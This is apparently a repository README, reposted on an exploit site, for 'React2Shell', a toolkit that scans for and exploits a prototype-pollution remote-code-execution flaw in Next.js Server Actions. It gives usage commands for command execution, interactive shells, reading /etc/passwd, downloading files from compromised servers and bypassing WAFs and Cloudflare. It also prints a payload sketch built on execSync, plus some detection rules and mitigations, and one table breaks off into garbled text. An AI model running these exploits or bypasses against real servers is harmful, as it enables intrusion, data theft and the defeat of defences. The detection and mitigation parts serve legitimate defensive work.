Share
## https://sploitus.com/exploit?id=ECBDF4EB-1153-5071-842E-3EA665481E35
# React2Shell Scanner


  
  
  
  
  


A comprehensive vulnerability scanner and exploitation toolkit for **React Server Components (RSC)** and **Next.js** applications affected by prototype pollution leading to Remote Code Execution.

## โš ๏ธ Disclaimer

**FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY**

This toolkit is designed for:
- โœ… Security researchers conducting authorized penetration tests
- โœ… Bug bounty hunters with proper authorization
- โœ… System administrators assessing their own infrastructure
- โœ… Educational purposes in controlled environments

**DO NOT USE** this tool against systems without explicit written permission. Unauthorized access to computer systems is illegal and punishable by law.

## ๐Ÿ” Overview

React2Shell exploits prototype pollution vulnerabilities in Next.js Server Actions (CVE-2025-55182 & CVE-2025-66478) to achieve Remote Code Execution on vulnerable Next.js applications (versions โ‰ค 15.1.3).

### Affected Versions
- Next.js โ‰ค 15.1.3
- Applications using Server Actions
- React Server Components with unsafe form handling

### Attack Vector
The vulnerability exploits `multipart/form-data` handling in Next.js Server Actions to pollute the prototype chain and achieve code execution via the `NEXT_REDIRECT` error mechanism.

## ๐Ÿš€ Features

### Core Scanners
- **scanner.py** - High-fidelity vulnerability detection based on Assetnote research
- **advanced_scan.py** - Multi-endpoint deep scanning with configuration testing
- **react2shell-ultimate.py** - Comprehensive scanner with all features

### Exploitation Tools
- **simple_exploit.py** - Quick single-command RCE for short outputs
- **wait_exploit.py** - Long-running command execution with full output capture
- **shell.py** / **fast_shell.py** - Interactive shell with directory tracking
- **download.py** - File download from compromised servers using base64 encoding
- **curl_exploit.sh** - Bash-based exploitation script

### WAF Bypass & Evasion
- **waf_bypass.py** - Payload encoding variations and path manipulation
- **advanced_waf_bypass.py** - Deep obfuscation with timing attacks
- **smuggling_bypass.py** - HTTP protocol-level bypass techniques
- **cf_bypass.py** - Cloudflare-specific bypass strategies

## ๐Ÿ“ฆ Installation

### Prerequisites
- Python 3.8 or higher
- pip package manager

### Setup

```bash
# Clone the repository
git clone https://github.com/yourusername/react2shell-scanner.git
cd react2shell-scanner

# Create virtual environment (recommended)
python3 -m venv .venv
source .venv/bin/activate  # On Windows: .venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt
```

### Dependencies
```
requests>=2.28.0
tqdm>=4.64.0
urllib3>=1.26.0
```

## ๐Ÿ’ป Usage

### Basic Scanning

```bash
# Scan a single URL
python3 scanner.py -u https://target.com

# Scan multiple URLs from file
python3 scanner.py -l sites.txt

# Advanced scan with deep testing
python3 advanced_scan.py https://target.com/app

# Ultimate scanner with all features
python3 react2shell-ultimate.py -u https://target.com
```

### Scanner Options

```bash
# Enable WAF bypass techniques
python3 scanner.py -u https://target.com --waf-bypass

# Scan with multiple threads
python3 scanner.py -l sites.txt -t 20

# Disable SSL verification (for testing)
python3 scanner.py -u https://target.com -k

# Custom headers
python3 scanner.py -u https://target.com -H "Authorization: Bearer token"

# Output results to JSON
python3 scanner.py -l sites.txt -o results.json

# Safe mode (detection only, no RCE)
python3 scanner.py -u https://target.com --safe-check
```

### Exploitation

#### Quick Command Execution
```bash
# Execute single command
python3 simple_exploit.py https://target.com/app whoami

# Execute command with full output
python3 wait_exploit.py https://target.com/app "cat /etc/passwd"
```

#### Interactive Shell
```bash
# Launch interactive shell
python3 shell.py https://target.com/app

# Fast shell with directory tracking
python3 fast_shell.py https://target.com/app
```

#### File Operations
```bash
# Download file from server
python3 download.py https://target.com/app /path/to/remote/file.txt ./local_file.txt

# Using curl script
./curl_exploit.sh https://target.com/app "ls -la"
```

### WAF Bypass

```bash
# Test WAF bypass techniques
python3 waf_bypass.py https://target.com

# Advanced WAF evasion
python3 advanced_waf_bypass.py https://target.com

# HTTP smuggling attempts
python3 smuggling_bypass.py target.com /app

# Cloudflare bypass strategies
python3 cf_bypass.py target.com
```

## ๐Ÿ› ๏ธ Tool Descriptions

### Scanner Tools

| Tool | Purpose | Key Features |
|------|---------|--------------|
| `scanner.py` | Primary vulnerability scanner | Multi-threaded, RCE verification, JSON output |
| `advanced_scan.py` | Deep application testing | Multiple endpoints, configuration detection |
| `react2shell-ultimate.py` | All-in-one scanner | Combines all detection methods |

### Exploitation Tools

| Tool | Purpose | Best For |
|------|---------|----------|
| `simple_exploit.py` | Quick RCE | Short commands ( [{
       source: '/:path*',
       headers: [
         {
           key: 'Content-Security-Policy',
           value: "default-src 'self'; script-src 'self'"
         }
       ]
     }]
   };
   ```

### For Security Teams

1. **Deploy WAF rules** - Block suspicious `multipart/form-data` patterns
2. **Monitor for exploitation** - Watch for `NEXT_REDIRECT` in error logs
3. **Rate limiting** - Implement aggressive rate limiting on POST endpoints
4. **Network segmentation** - Isolate Next.js servers from sensitive resources
5. **Regular scanning** - Use this tool to audit your infrastructure

### Detection Signatures

**WAF/IDS Rules:**
```
# Detect exploit pattern
alert tcp any any -> any any (msg:"React2Shell Exploit Attempt"; 
  content:"__proto__"; content:"NEXT_REDIRECT"; 
  content:"constructor:constructor"; 
  sid:1000001; rev:1;)
```

**Log Monitoring:**
```bash
# Check for exploitation attempts
grep "NEXT_REDIRECT" /var/log/nextjs/*.log
grep "__proto__" /var/log/nextjs/*.log
grep "constructor:constructor" /var/log/nextjs/*.log
```

## ๐ŸŽฏ Technical Details

### Exploit Mechanism

1. **Prototype Pollution**: Exploit sends crafted `multipart/form-data` with `__proto__` keys
2. **Constructor Hijacking**: Pollutes `_formData.get` to reference `constructor:constructor`
3. **Code Injection**: Injects malicious code into `_response._prefix`
4. **Execution Trigger**: Forces `NEXT_REDIRECT` error to execute payload
5. **Output Exfiltration**: Captures command output in `X-Action-Redirect` header

### Payload Structure
```javascript
// Simplified exploit payload
var res = process.mainModule.require('child_process')
  .execSync('command').toString();

throw Object.assign(new Error('NEXT_REDIRECT'), {
  digest: `NEXT_REDIRECT;push;/login?a=${res};307;`
});
```

### Detection Method
The scanner detects vulnerabilities by:
1. Sending specially crafted Server Action requests
2. Looking for `303 See Other` status codes
3. Checking for `X-Action-Redirect` headers
4. Verifying command execution via unique markers

## ๐Ÿ“š References

- [Assetnote Research: React2Shell](https://www.assetnote.io/)
- [CVE-2025-55182](https://cve.mitre.org/)
- [CVE-2025-66478](https://cve.mitre.org/)
- [Next.js Security Advisory](https://nextjs.org/security)
- [OWASP Prototype Pollution](https://owasp.org/www-community/vulnerabilities/Prototype_Pollution)

## ๐Ÿค Contributing

Contributions are welcome! Please follow these guidelines:

1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add new bypass technique'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Open a Pull Request

### Development Setup
```bash
# Install development dependencies
pip install -r requirements.txt

# Run tests (if available)
python -m pytest tests/

# Format code
black *.py
```

## ๐Ÿ“ License

This project is released for **educational and authorized security testing purposes only**.

By using this software, you agree to:
- Only test systems you own or have explicit permission to test
- Comply with all applicable laws and regulations
- Use the tool responsibly and ethically
- Not use the tool for malicious purposes

**NO WARRANTY**: This software is provided "as is" without warranty of any kind.

## โšก Changelog

### v1.0.0 (December 2025)
- Initial release
- Core scanner implementation
- Multiple exploitation tools
- WAF bypass capabilities
- Interactive shell support
- File download functionality
- Comprehensive documentation

## ๐Ÿ‘ฅ Authors

- Security Research Team
- Based on research by Assetnote Security

## ๐Ÿ™ Acknowledgments

- **Assetnote Security Research Team** - Original vulnerability research
- **Next.js Team** - Prompt security patches
- **Security Community** - Testing and feedback

## ๐Ÿ“ง Contact

For security issues or responsible disclosure:
- Open a GitHub issue (for non-sensitive matters)
- Contact the maintainers privately (for security concerns)

---

**Remember**: With great power comes great responsibility. Use this tool ethically and legally.

โญ If this tool helped you in your security research, consider giving it a star!